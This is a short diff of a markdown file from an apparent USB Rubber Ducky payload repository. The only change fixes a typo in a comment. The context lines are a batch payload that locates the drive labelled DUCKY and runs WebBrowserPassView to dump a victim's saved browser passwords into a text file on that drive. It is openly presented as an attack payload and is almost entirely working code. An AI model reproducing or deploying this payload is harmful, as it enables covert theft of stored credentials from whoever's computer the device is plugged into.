abhinavvv03/Rubber-Duckey/Payload---mrgray's-rubber-hacks.md

 for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)

-REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
+REM Output everything to this folder so I don't have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks

 start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt